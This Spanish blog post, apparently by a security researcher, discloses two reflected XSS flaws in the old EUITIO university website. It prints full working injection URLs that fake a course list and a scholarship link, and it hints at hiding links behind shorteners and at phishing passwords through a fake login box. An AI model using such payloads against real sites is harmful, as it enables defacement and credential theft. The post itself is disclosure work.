XSS en la antigua web de la EUITIO

Hace algún tiempo hablaba con un compañero sobre vulnerabilidades web y él mantenía que los ataques XSS no eran un peligro real, ya que no se modificaban los datos del servidor ni se accedían a sitios restringidos. Lo preocupante es que no es el único que piensa así.

Ya había publicado antes cosas relacionadas con XSS, como el fallo que tuvo RTVE con la web de Eurovisión, o el falló que descubrí en Crellan. La EUITIO, que ahora se llama EII (sí, lo sé, suena a chiste), ha estrenado nueva web… así que voy a publicar dos XSS que descubrí hace algún tiempo para la web antigua y luego que venga alguien a decirme que no son “peligrosos”.

Una de las vulnerabilidades se encuentra en “http://www.euitio.uniovi.es/info_academica/asignaturas/index.php” que acepta el parámetro “plan” para indicarle que plan de estudios tiene que mostrar. Si no recibe parámetro, toma por defecto 2002. ¿Qué pasa si le pasamos un plan que no exista, por ejemplo 1234 (http://www.euitio.uniovi.es/info_academica/asignaturas/index.php?plan=1234)? Pues que intenta mostrarnoslo… y nos dice que no tiene asignaturas.

Yo he creado una inyección un pelín más sofisticada y me he creado el mio:

http://www.euitio.uniovi.es/info_academica/asignaturas/index.php?plan=2011%3Cstyle%20type=text/css%3Ebody%3Eul%7Bdisplay:none;%7Dbody%3Eh2%7Bdisplay:none;%7Dh2%2Bdiv%7Bdisplay:none;%7Ddiv%2Bh2%7Bdisplay:none;%7D%3C/style%3E%3Ch2%3EPrimero%3C/h2%3E%3Cul%3E%3Cli%3ETrigonometr%EDa%20cu%E1ntica%20de%20los%20campos%20hiperb%F3licos%3C/li%3E%3C/ul%3E%3Ch2%3ESegundo%3C/h2%3E%3Cul%3E%3Cli%3EParabolas%20senocoidales%20del%20flujo%20espacio-tiempo%3C/li%3E%3C/ul%3E%3Ch2%3ETercero%3C/h2%3E%3Cul%3E%3Cli%3EFiesta,%20sexo,%20alcohol%20y%20Rock%20and%20Roll%3C/li%3E%3Cli%3EDisertaci%F3n%20sobre%20la%20respuesta%20universal:%2042%3C/li%3E%3C/ul%3E%3Cdiv%20style=display:none%3E.%3C/div%3E

La url puede parecer muy larga.. pero si usamos un acortador de URL, o la ponemos en una web, o en un email o… en fin, que las posibilidades son muchas.

El resultado es este (clic para ampliar):

 

Otra vulnerable es la sección de becas. En este caso me he tomado la libertad de añadir una nueva beca:

http://www.euitio.uniovi.es/servicios/ofertas/index.php?tipo=Becas%3Cul%3E%3Cli%3E%3Ca%20href=%23%20OnClick=alert%28/Lo_sentimos_la_beca_ha_sido_ocupada_por_El_Hombre_Invisible/%29%3EBeca%20de%20colaboraci%F3n%20con%20Superman%3C/a%3E%3C/li%3E%3C/ul%3E%3Cstyle%20type=text/css%3E%20body%3Eul%20{display:none;}%3C/style%3E#

Y el resultado (clic para ampliar):

 

Obviamente ambos ejemplos son evidentemente falsos y nadie con dos dedos de frente se creería ninguno de ellos. No están pensados para “hacer daño” ni para “engañar” a nadie, sino para demostrar que hay un problema… ¿os imagináis que pasaría si el objetivo del XSS fuese la caja de login? No sería muy difícil reemplazarla y que la gente enviase la contraseña a una dirección de mail….

PD: Por si alguien prueba estos enlaces y no consigue nada… están probados con Firefox 3.x, si usais IE8 no funcionarán porque tiene de serie protección contra XSS (aunque la gente siga diciendo que IE es inseguro… yo no dejo de verle características de seguridad que los demás no tienen…). IE8 tiene protección contra XSS y saltó cuando me envié el enlace por GMail:

Curiosamente desde aquí no pone ninguna pega… algo me dice que ese filtro tiene que mejorar bastante xD

About the Author

Me llamo Pablo Carballude González, soy graduado en computación con master en HCI y Seguridad Informática. Actualmente trabajo para Amazon en Seattle como Software Developer Engineer. Soy de esas personas que no saben si los textos autobiográficos deben ser en primera o tercera persona. Lo intenté en segunda, pero no le entendí nada :P